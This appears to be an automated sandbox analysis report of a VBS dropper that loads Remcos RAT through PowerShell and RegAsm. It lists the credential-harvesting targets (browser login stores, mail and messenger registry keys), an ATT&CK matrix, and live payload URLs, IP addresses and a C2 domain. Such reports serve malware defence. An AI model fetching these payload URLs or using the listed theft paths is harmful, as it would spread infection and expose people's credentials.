                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00404F51 GetLocalTime,CreateEventA,CreateThread,4_2_00404F51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041B60D GetComputerNameExW,GetUserNameW,4_2_0041B60D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,4_2_00449190
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041739B GetVersionExW,7_2_0041739B
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: wscript.exe, 00000000.00000003.1989125695.000001DA6157B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1988144159.000001DA61567000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1991345397.000001DA6157D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: APT.EXE

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.powershell.exe.1b1e29723d0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.powershell.exe.1b1e29723d0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.3265268792.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2109299164.000001B1E188F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2109299164.000001B1E269C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4432, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5684, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\sfvnspt.dat, type: DROPPED
                  Contains functionality to steal Chrome passwords or cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data4_2_0040BA12
                  Contains functionality to steal Firefox passwords or cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\4_2_0040BB30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \key3.db4_2_0040BB30
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Tries to steal Instant Messenger accounts or passwords
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                  Tries to steal Mail credentials (via file registry)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ESMTPPassword8_2_004033F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, PopPassword8_2_00402DB3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, SMTPPassword8_2_00402DB3
                  Yara detected WebBrowserPassView password recovery tool
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3620, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.powershell.exe.1b1e29723d0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.powershell.exe.1b1e29723d0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.3265268792.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2109299164.000001B1E188F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2109299164.000001B1E269C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4432, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5684, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\sfvnspt.dat, type: DROPPED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe4_2_0040569A

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information331
                  Scripting                  		Valid Accounts11
                  Windows Management Instrumentation                  		331
                  Scripting                  		1
                  DLL Side-Loading                  		11
                  Deobfuscate/Decode Files or Information                  		2
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services11
                  Archive Collected Data                  		14
                  Ingress Tool Transfer                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts11
                  Native API                  		1
                  DLL Side-Loading                  		1
                  Bypass User Account Control                  		13
                  Obfuscated Files or Information                  		211
                  Input Capture                  		1
                  Account Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		21
                  Encrypted Channel                  		Exfiltration Over Bluetooth1
                  Defacement
                  Email AddressesDNS ServerDomain Accounts1
                  Exploitation for Client Execution                  		1
                  Windows Service                  		1
                  Access Token Manipulation                  		1
                  Software Packing                  		2
                  Credentials in Registry                  		1
                  System Service Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		3
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts222
                  Command and Scripting Interpreter                  		Login Hook1
                  Windows Service                  		1
                  DLL Side-Loading                  		3
                  Credentials In Files                  		3
                  File and Directory Discovery                  		Distributed Component Object Model211
                  Input Capture                  		214
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud Accounts2
                  Service Execution                  		Network Logon Script422
                  Process Injection                  		1
                  Bypass User Account Control                  		LSA Secrets39
                  System Information Discovery                  		SSH3
                  Clipboard Data                  		Fallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable Media2
                  PowerShell                  		RC ScriptsRC Scripts11
                  Masquerading                  		Cached Domain Credentials141
                  Security Software Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                  Virtualization/Sandbox Evasion                  		DCSync21
                  Virtualization/Sandbox Evasion                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Access Token Manipulation                  		Proc Filesystem4
                  Process Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt422
                  Process Injection                  		/etc/passwd and /etc/shadow1
                  Application Window Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Owner/User Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1483434 Sample: createdthingstobefrankwithm... Startdate: 27/07/2024 Architecture: WINDOWS Score: 100 51 iwarsut775laudrye2.duckdns.org 2->51 53 new.quranushaiqer.org.sa 2->53 55 3 other IPs or domains 2->55 75 Multi AV Scanner detection for domain / URL 2->75 77 Found malware configuration 2->77 79 Malicious sample detected (through community Yara rule) 2->79 83 22 other signatures 2->83 12 wscript.exe 1 2->12         started        signatures3 81 Uses dynamic DNS services 51->81 process4 signatures5 115 VBScript performs obfuscated calls to suspicious functions 12->115 117 Suspicious powershell command line found 12->117 119 Wscript starts Powershell (via cmd or directly) 12->119 121 4 other signatures 12->121 15 powershell.exe 14 15 12->15         started        process6 dnsIp7 65 104.168.45.34, 49705, 80 AS-COLOCROSSINGUS United States 15->65 67 198.46.176.133, 49704, 80 AS-COLOCROSSINGUS United States 15->67 69 Writes to foreign memory regions 15->69 71 Suspicious execution chain found 15->71 73 Injects a PE file into a foreign processes 15->73 19 RegAsm.exe 6 16 15->19         started        24 conhost.exe 15->24         started        signatures8 process9 dnsIp10 57 iwarsut775laudrye2.duckdns.org 192.253.251.227, 49706, 49707, 49708 THORDC-ASIS United States 19->57 59 geoplugin.net 178.237.33.50, 49709, 80 ATOM86-ASATOM86NL Netherlands 19->59 47 C:\Users\user\AppData\Roaming\sfvnspt.dat, data 19->47 dropped 49 C:\Users\user\AppData\...\Forfrelsens.vbs, ASCII 19->49 dropped 93 Contains functionality to bypass UAC (CMSTPLUA) 19->93 95 Tries to steal Mail credentials (via file registry) 19->95 97 Potential malicious VBS script found (suspicious strings) 19->97 99 8 other signatures 19->99 26 wscript.exe 1 19->26         started        29 RegAsm.exe 1 19->29         started        31 RegAsm.exe 1 19->31         started        33 2 other processes 19->33 file11 signatures12 process13 signatures14 101 Suspicious powershell command line found 26->101 103 Wscript starts Powershell (via cmd or directly) 26->103 105 Obfuscated command line found 26->105 113 3 other signatures 26->113 35 powershell.exe 15 21 26->35         started        107 Tries to steal Instant Messenger accounts or passwords 29->107 109 Tries to steal Mail credentials (via file / registry access) 29->109 111 Tries to harvest and steal browser information (history, passwords, etc) 31->111 process15 dnsIp16 61 asociatiatraditiimaria.ro 93.113.54.56, 443, 49711, 49719 GTSCEGTSCentralEuropeAntelGermanyCZ Romania 35->61 63 new.quranushaiqer.org.sa 34.166.62.190, 443, 49720 ATGS-MMD-ASUS United States 35->63 85 Suspicious powershell command line found 35->85 87 Obfuscated command line found 35->87 89 Very long command line found 35->89 91 Found suspicious powershell code related to unpacking or dynamic code loading 35->91 39 powershell.exe 35->39         started        41 conhost.exe 35->41         started        43 cmd.exe 35->43         started        signatures17 process18 process19 45 cmd.exe 39->45         started       

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  createdthingstobefrankwithmeeverywhere.gIF.vbs0%ReversingLabs
                  createdthingstobefrankwithmeeverywhere.gIF.vbs18%VirustotalBrowse

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  SourceDetectionScannerLabelLink
                  bg.microsoft.map.fastly.net0%VirustotalBrowse
                  asociatiatraditiimaria.ro15%VirustotalBrowse
                  geoplugin.net1%VirustotalBrowse
                  iwarsut775laudrye2.duckdns.org19%VirustotalBrowse
                  new.quranushaiqer.org.sa17%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  http://www.imvu.comr0%URL Reputationsafe
                  http://www.imvu.comr0%URL Reputationsafe
                  https://contoso.com/License0%URL Reputationsafe
                  https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
                  https://gmpg.org/xfn/110%URL Reputationsafe
                  http://geoplugin.net/json.gp/C0%URL Reputationsafe
                  https://contoso.com/0%URL Reputationsafe
                  https://nuget.org/nuget.exe0%URL Reputationsafe
                  https://login.yahoo.com/config/login0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  http://nuget.org/NuGet.exe0%URL Reputationsafe
                  https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=P0%Avira URL Cloudsafe
                  http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                  http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
                  http://www.nirsoft.net0%Avira URL Cloudsafe
                  http://www.imvu.com0%URL Reputationsafe
                  https://api.w.org/0%URL Reputationsafe
                  https://asociatiatraditiimaria.ro/feed/0%Avira URL Cloudsafe
                  http://198.46.176.133/Upload/vbs.jpegM0%Avira URL Cloudsafe
                  https://contoso.com/Icon0%URL Reputationsafe
                  https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfm100%Avira URL Cloudmalware
                  http://geoplugin.net/json.gp0%URL Reputationsafe
                  https://aka.ms/pscore680%URL Reputationsafe
                  http://www.ebuddy.com0%URL Reputationsafe
                  http://www.nirsoft.net0%VirustotalBrowse
                  https://asociatiatraditiimaria.ro/wp-content/plugins/elementor/assets/css/frontend-lite.min.css?ver=0%Avira URL Cloudsafe
                  https://aefd.nelreports.net/api/report?cat=bingaotak0%Avira URL Cloudsafe
                  https://asociatiatraditiimaria.ro/feed/14%VirustotalBrowse
                  https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfm17%VirustotalBrowse
                  https://asociatiatraditiimaria.ro/wp-content/uploads/elementor/css/post-2731.css?ver=172076376714%VirustotalBrowse
                  https://aefd.nelreports.net/api/report?cat=bingaotak0%VirustotalBrowse
                  http://198.46.176.13314%VirustotalBrowse
                  http://198.46.176.1330%Avira URL Cloudsafe
                  https://asociatiatraditiimaria.ro/wp-content/uploads/elementor/css/post-2731.css?ver=17207637670%Avira URL Cloudsafe
                  http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
                  https://asociatiatraditiimaria.ro/wp-includes/css/dist/block-library/style.min.css?ver=6.6.10%Avira URL Cloudsafe
                  https://www.google.com0%Avira URL Cloudsafe
                  https://fp-afd.azurefd.us/apc/trans.gif?94fb5ac9609bcb4cda0bf8acf18270730%Avira URL Cloudsafe
                  https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-LAX31r5a&FrontEnd=AF0%Avira URL Cloudsafe
                  https://maps.windows.com/windows-app-web-link0%Avira URL Cloudsafe
                  https://asociatiatraditiimaria.ro/wp-includes/css/dist/block-library/style.min.css?ver=6.6.114%VirustotalBrowse
                  https://asociatiatraditiimaria.ro/wp-content/plugins/elementor/assets/css/frontend-lite.min.css?ver=14%VirustotalBrowse
                  https://asociatiatraditiimaria.ro0%Avira URL Cloudsafe
                  https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-LAX31r5a&FrontEnd=AF0%VirustotalBrowse
                  https://asociatiatraditiimaria.ro/os/transportment.pfm100%Avira URL Cloudmalware
                  https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfm0100%Avira URL Cloudmalware
                  https://aka.ms/pscore6lBjq0%Avira URL Cloudsafe
                  https://asociatiatraditiimaria.ro5%VirustotalBrowse
                  https://maps.windows.com/windows-app-web-link0%VirustotalBrowse
                  https://asociatiatraditiimaria.ro/os/transportment.pfm4%VirustotalBrowse
                  https://www.google.com0%VirustotalBrowse
                  http://104.168.45.340%Avira URL Cloudsafe
                  http://www.nirsoft.net/0%Avira URL Cloudsafe
                  http://www.imvu.comata0%Avira URL Cloudsafe
                  iwarsut775laudrye2.duckdns.org100%Avira URL Cloudmalware
                  https://www.office.com/0%Avira URL Cloudsafe
                  http://www.nirsoft.net/0%VirustotalBrowse
                  http://198.46.176.133/Upload/vbs.jpeg100%Avira URL Cloudmalware
                  https://asociatiatraditiimaria.ro/comments/feed/0%Avira URL Cloudsafe
                  https://fp-afd.azurefd.us/apc/trans.gif?0cf92be82316943650f2ee723bc6949e0%Avira URL Cloudsafe
                  http://104.168.45.344%VirustotalBrowse
                  iwarsut775laudrye2.duckdns.org19%VirustotalBrowse
                  https://www.office.com/0%VirustotalBrowse
                  https://asociatiatraditiimaria.ro/wp-json/0%Avira URL Cloudsafe
                  https://github.com/Pester/Pester0%Avira URL Cloudsafe
                  https://aefd.nelreports.net/api/report?cat=bingaot0%Avira URL Cloudsafe
                  http://198.46.176.133/Upload/vbs.jpeg19%VirustotalBrowse
                  https://asociatiatraditiimaria.ro/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.7.20%Avira URL Cloudsafe
                  https://github.com/Pester/Pester1%VirustotalBrowse
                  https://new.quranushaiqer.org.sa100%Avira URL Cloudmalware
                  https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfml100%Avira URL Cloudmalware
                  https://asociatiatraditiimaria.ro/comments/feed/14%VirustotalBrowse
                  https://aefd.nelreports.net/api/report?cat=bingrms0%Avira URL Cloudsafe
                  https://www.google.com/accounts/servicelogin0%Avira URL Cloudsafe
                  https://asociatiatraditiimaria.ro/wp-json/14%VirustotalBrowse
                  https://aefd.nelreports.net/api/report?cat=bingaot0%VirustotalBrowse
                  http://104.168.45.34/59/LMTS.txt100%Avira URL Cloudmalware
                  https://new.quranushaiqer.org.sa3%VirustotalBrowse
                  https://asociatiatraditiimaria.ro/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.7.214%VirustotalBrowse
                  https://aefd.nelreports.net/api/report?cat=bingrms0%VirustotalBrowse

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  bg.microsoft.map.fastly.net
                  		199.232.214.172
                  		truefalseunknown
                  asociatiatraditiimaria.ro
                  		93.113.54.56
                  		truefalseunknown
                  geoplugin.net
                  		178.237.33.50
                  		truefalseunknown
                  iwarsut775laudrye2.duckdns.org
                  		192.253.251.227
                  		truetrueunknown
                  new.quranushaiqer.org.sa
                  		34.166.62.190
                  		truefalseunknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
